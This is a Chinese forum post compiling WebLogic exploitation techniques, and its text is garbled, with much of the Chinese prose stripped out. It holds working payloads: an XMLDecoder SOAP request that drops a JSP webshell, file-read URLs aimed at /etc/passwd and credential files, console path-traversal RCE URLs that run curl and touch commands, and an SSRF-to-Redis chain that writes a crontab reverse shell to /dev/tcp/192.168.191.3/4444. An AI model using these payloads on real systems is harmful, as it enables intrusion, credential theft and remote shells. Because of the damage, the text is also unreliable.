[191] 2021-03-23_Weblogic漏洞利用总结

文档创建者:s7ckTeam
浏览次数:51
最后更新:2025-01-16
2021-03-23_Weblogic漏洞利用总结 W e b l o g i c x i a o   A d m i n   T e a m   2 0 2 1 - 0 3 - 2 3 w e b l o g i c W e b l o g i c O r a c l e ( a p p l i c a t i o n   s e r v e r ) J a v a   E E W e b J a v a W e b l o g i c J a v a J a v a   E n t e r p r i s e J a v a J a v a   E E J a v a   E E W e b l o g i c J a v a   E E E J B   J S P s e r v l e t J M S J S P s e r v l e t E J B J a v a W e b l o g i c   S e r v e r W e b C V E - 2 0 1 7 - 1 0 2 7 1       W e b l o g i c W L S   S e c u r i t y w e b s e r v i c e 使 X M L D e c o d e r X M L x m l s h e l l                                             1 0 . 3 . 6 . 0 . 0 1 2 . 1 . 3 . 0 . 0 1 2 . 2 . 1 . 1 . 0 1 2 . 2 . 1 . 2 . 0         1 . 访   i p : 7 0 0 1 / / w l s - w s a t / C o o r d i n a t o r P o r t T y p e         2 . 使 b u r p r e p e a t e r p a y l o a d         / w l s - w s a t / C o o r d i n a t o r P o r t T y p e         / w l s - w s a t / R e g i s t r a t i o n P o r t T y p e R P C         / w l s - w s a t / P a r t i c i p a n t P o r t T y p e         / w l s - w s a t / R e g i s t r a t i o n R e q u e s t e r P o r t T y p e         / w l s - w s a t / C o o r d i n a t o r P o r t T y p e 1 1         / w l s - w s a t / R e g i s t r a t i o n P o r t T y p e R P C 1 1         / w l s - w s a t / P a r t i c i p a n t P o r t T y p e 1 1         / w l s - w s a t / R e g i s t r a t i o n R e q u e s t e r P o r t T y p e 1 1 P O S T   / w l s - w s a t / C o o r d i n a t o r P o r t T y p e   H T T P / 1 . 1 H o s t :   i p : 7 0 0 1 A c c e p t - E n c o d i n g :   g z i p ,   d e f l a t e A c c e p t :   * / * A c c e p t - L a n g u a g e :   e n U s e r - A g e n t :   M o z i l l a / 5 . 0   ( c o m p a t i b l e ;   M S I E   9 . 0 ;   W i n d o w s   N T   6 . 1 ;   W i n 6 4 ;   x 6 4 ;   T r i d e n t / 5 . 0 ) C o n n e c t i o n :   c l o s e C o n t e n t - T y p e :   t e x t / x m l C o n t e n t - L e n g t h :   6 3 7 < s o a p e n v : E n v e l o p e   x m l n s : s o a p e n v = " h t t p : / / s c h e m a s . x m l s o a p . o r g / s o a p / e n v e l o p e / " >         < s o a p e n v : H e a d e r >
1 2 3 3 . s h e l l s h e l l v p s 使 n c 4 4 4 4         < w o r k : W o r k C o n t e x t   x m l n s : w o r k = " h t t p : / / b e a . c o m / 2 0 0 4 / 0 6 / s o a p / w o r k a r e a / " >         < j a v a > < j a v a   v e r s i o n = " 1 . 4 . 0 "   c l a s s = " j a v a . b e a n s . X M L D e c o d e r " >         < o b j e c t   c l a s s = " j a v a . i o . P r i n t W r i t e r " >           < s t r i n g > s e r v e r s / A d m i n S e r v e r / t m p / _ W L _ i n t e r n a l / b e a _ w l s _ i n t e r n a l / 9 j 4 d q k / w a r / t e s t . j s p < / s t r i n g >         < v o i d   m e t h o d = " p r i n t l n " > < s t r i n g >         < ! [ C D A T A [ < %   o u t . p r i n t ( " 1 2 3 " ) ;   % >         ] ] >         < / s t r i n g >         < / v o i d >         < v o i d   m e t h o d = " c l o s e " / >         < / o b j e c t > < / j a v a > < / j a v a >         < / w o r k : W o r k C o n t e x t >         < / s o a p e n v : H e a d e r >         < s o a p e n v : B o d y / > < / s o a p e n v : E n v e l o p e >
C V E - 2 0 1 9 - 2 6 1 8         w e b l o g i c g e t s h e l l w e b s h e l l         W e b L o g i c   1 0 . 3 . 6 . 0 1 2 . 1 . 3 . 0 1 2 . 2 . 1 . 3 1 .       访 u r l     ( h t t p : / / I P : 7 0 0 1 / h e l l o / f i l e . j s p ? p a t h = / e t c / p a s s w d )   ,  
        w e b l o g i c 使 A E S 3 D E S b a s e _ d o m a i n S e r i a l i z e d S y s t e m I n i . d a t c o n f i g . x m l S e r i a l i z e d S y s t e m I n i . d a t b u r p s u i t e b u r p c o p y   t o   f i l e   c o n f i g . x m l b a s e _ d o m a i n ( : h t t p s : / / g i t h u b . c o m / T i d e S e c / D e c r y p t _ W e b l o g i c _ P a s s w o r d ) 使 5 2 . g e t s h e l l         1 . 使 w e b l o g i c h t t p : / / y o u r I p : 7 0 0 1 / h e l l o / f i l e . j s p ? p a t h = s e c u r i t y / S e r i a l i z e d S y s t e m I n i . d a t h t t p : / / y o u r I P : 7 0 0 1 / h e l l o / f i l e . j s p ? p a t h = c o n f i g / c o n f i g . x m l h t t p s : / / c i r t . n e t / p a s s w o r d s ? c r i t e r i a = w e b l o g i c   使   : w e b l o g i c   : O r a c l e @ 1 2 3  
        2 .         3 . w a r                 w a r w e b w a r w e b w a r J a v a W e b w a r c l a s s h t m l j s p w a r w e b 西                 使 j s p w a r                 w a r w a r         4 . 使 ( r e b e y o n d ) g e t s h e l l j a r   - c v f   s h e l l . w a r   s h e l l . j s p
C V E - 2 0 2 0 - 1 4 8 8 2         H T T P   W e b L o g i c   S e r v e r   C o n s o l e   W e b L o g i c   S e r v e r   C o n s o l e   C V E - 2 0 2 0 - 1 4 8 8 3 :         H T T P   W e b L o g i c   S e r v e r   C o n s o l e C V E - 2 0 2 0 - 1 4 8 8 3 访 U R L 访         C V E - 2 0 2 0 - 1 4 8 8 3 C V E - 2 0 2 0 - 1 4 8 8 2   :             C V E - 2 0 2 0 - 1 4 8 8 3   H T T P   W e b L o g i c   S e r v e r   C o n s o l e     W e b L o g i c   S e r v e r   C o n s o l e           O r a c l e   W e b l o g i c   S e r v e r   1 0 . 3 . 6 . 0 . 0 O r a c l e   W e b l o g i c   S e r v e r   1 2 . 1 . 3 . 0 . 0 O r a c l e   W e b l o g i c   S e r v e r   1 2 . 2 . 1 . 3 . 0 O r a c l e   W e b l o g i c   S e r v e r   1 2 . 2 . 1 . 4 . 0 O r a c l e   W e b l o g i c   S e r v e r   1 4 . 1 . 1 . 0 . 0 / c o n s o l e / i m a g e s / % 2 5 2 E % 2 5 2 E % 2 5 2 F c o n s o l e . p o r t a l / c o n s o l e / c s s / % 2 5 2 e % 2 5 2 e % 2 5 2 f c o n s o l e . p o r t a l / c o n s o l e / c s s / % 2 5 % 3 2 % 6 5 % 2 5 % 3 2 % 6 5 % 2 5 % 3 2 % 6 6 c o n s o l e . p o r t a l
1 .     c o m . t a n g o s o l . c o h e r e n c e . m v e l 2 . s h . S h e l l S e s s i o n   D N S L O G 使 使           D N S L O G   h t t p : / / w w w . d n s l o g . c n /   G E T   使 p a y l o a d 访 U R L d o c k e r           W e b l o g i c   1 2 . 2 . 1 1 0   c o m . t a n g o s o l . c o h e r e n c e . m v e l 2 . s h . S h e l l S e s s i o n   2 . c o m . b e a . c o r e . r e p a c k a g e d . s p r i n g f r a m e w o r k . c o n t e x t . s u p p o r t . F i l e S y s t e m X m l A p p l i c a t i o n C o n t e x t X M L :   c o m . t a n g o s o l . c o h e r e n c e . m v e l 2 . s h . S h e l l S e s s i o n     c o m . b e a . c o r e . r e p a c k a g e d . s p r i n g f r a m e w o r k . c o n t e x t . s u p p o r t . F i l e S y s t e m X m l A p p l i c a t i o n C o n t e x t   D N S L O G D N S h t t p : / / I P : 7 0 0 1 / / c o n s o l e / c s s / % 2 5 2 e % 2 5 2 e % 2 5 2 f c o n s o l e . p o r t a l ? _ n f p b = t r u e & _ p a g e L a b e l = & h a n d l e = c o m . t a n g o s o l . c o h e r e n c e . m v e l 2 . s h . S h e l l S e s s i o n ( " j a v a . l a n g . R u n t i m e . g e t R u n t i m e ( ) . e x e c ( ' c u r l % 2 0 x x . d n s l o g . c n ' ) ; " ) h t t p : / / i p : / c o n s o l e / c s s / % 2 5 2 e % 2 5 2 e % 2 5 2 f c o n s o l e . p o r t a l ? _ n f p b = t r u e & _ p a g e L a b e l = & h a n d l e = c o m . t a n g o s o l . c o h e r e n c e . m v e l 2 . s h . S h e l l S e s s i o n ( " j a v a . l a n g . R u n t i m e . g e t R u n t i m e ( ) . e x e c ( ' t o u c h % 2 0 / t m p / s u c c e s s 1 ' ) ; " ) W e b l o g i c 访 x m l X M L 访 < ? x m l   v e r s i o n = " 1 . 0 "   e n c o d i n g = " U T F - 8 "   ? >
        U R L W e b l o g i c X M L g e t s h e l l         访   ( h t t p : / / i p : 7 0 0 1 / c o n s o l e / l o g i n / L o g i n F o r m . j s p )   使 b u r p p a y l o a d < b e a n s   x m l n s = " h t t p : / / w w w . s p r i n g f r a m e w o r k . o r g / s c h e m a / b e a n s "       x m l n s : x s i = " h t t p : / / w w w . w 3 . o r g / 2 0 0 1 / X M L S c h e m a - i n s t a n c e "       x s i : s c h e m a L o c a t i o n = " h t t p : / / w w w . s p r i n g f r a m e w o r k . o r g / s c h e m a / b e a n s   h t t p : / / w w w . s p r i n g f r a m e w o r k . o r g / s c h e m a / b e a n s / s p r i n g - b e a n s . x s d " >         < b e a n   i d = " p b "   c l a s s = " j a v a . l a n g . P r o c e s s B u i l d e r "   i n i t - m e t h o d = " s t a r t " >                 < c o n s t r u c t o r - a r g >                     < l i s t >                         < v a l u e > b a s h < / v a l u e >                         < v a l u e > - c < / v a l u e >                         < v a l u e > < ! [ C D A T A [ c u r l   p n w 4 6 y . d n s l o g . c n ] ] > < / v a l u e >                     < / l i s t >                 < / c o n s t r u c t o r - a r g >         < / b e a n > < / b e a n s > h t t p : / / y o u r - i p : 7 0 0 1 / c o n s o l e / c s s / % 2 5 2 e % 2 5 2 e % 2 5 2 f c o n s o l e . p o r t a l ? _ n f p b = t r u e & _ p a g e L a b e l = & h a n d l e = c o m . b e a . c o r e . r e p a c k a g e d . s p r i n g f r a m e w o r k . c o n t e x t . s u p p o r t . F i l e S y s t e m X m l A p p l i c a t i o n C o n t e x t ( " h t t p : / / i p . x m l " )
( h t t p s : / / g i t h u b . c o m / b a c k l i o n / C V E - 2 0 2 0 - 1 4 8 8 2 _ A L L ) s s r f         W e b l o g i c S S R F H T T P r e d i s f a s t c g i         S S R F 访         O r a c l e   W e b L o g i c   S e r v e r   1 0 . 3 . 6 . 0         O r a c l e   W e b L o g i c   S e r v e r   1 0 . 0 . 2 . 0 r e d i s         R e d i s 使 A N S I   C B S D K e y - V a l u e A P I         v a l u e   ( S t r i n g ) ,   ( H a s h ) ,   ( l i s t ) ,   ( s e t s )     ( s o r t e d   s e t s ) 访   S e a r c h P u b l i c R e g i s t r i e s . j s p             1 . 使 b u r p o p e r a t o r u r l   u r l   (   )         访 h t t p : / / 1 9 2 . 1 6 8 . 3 1 . 1 8 7 : 7 0 0 1 / u d d i e x p l o r e r / S e a r c h P u b l i c R e g i s t r i e s . j s p
        ` c o u l d   n o t   c o n n e c t   o v e r   H T T P   t o   s e r v e r `         访 h t t p ` d i d   n o t   h a v e   a   v a l i d   S O A P   c o n t e n t - t y p e ` r e d i s s h e l l w e b l o g i c s s r f G E T * * % 0 a % 0 d * * ( r e d i s ) S S R F r e d i s s s r f r e d i s r e d i s 6 3 7 9         1 . s s r f r e d i s d o c k e r 1 7 2 . *         2 . r e d i s s h e l l t e s t s e t   1   " n n n n *   *   *   *   *   r o o t   b a s h   - i   > &   / d e v / t c p / 1 9 2 . 1 6 8 . 1 9 1 . 3 / 4 4 4 4   0 > & 1 n n n n " c o n f i g   s e t   d i r   / e t c / c o n f i g   s e t   d b f i l e n a m e   c r o n t a b s a v e
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则